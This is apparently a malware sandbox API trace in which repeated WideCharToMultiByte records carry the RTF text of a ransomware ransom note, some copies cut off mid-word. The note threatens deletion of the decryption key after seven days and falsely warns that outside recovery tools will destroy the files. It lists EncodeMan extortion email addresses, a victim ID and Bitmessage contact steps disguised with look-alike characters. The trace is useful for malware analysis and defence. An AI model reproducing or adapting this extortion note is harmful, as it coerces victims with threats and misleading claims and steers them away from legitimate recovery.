Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235cca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in 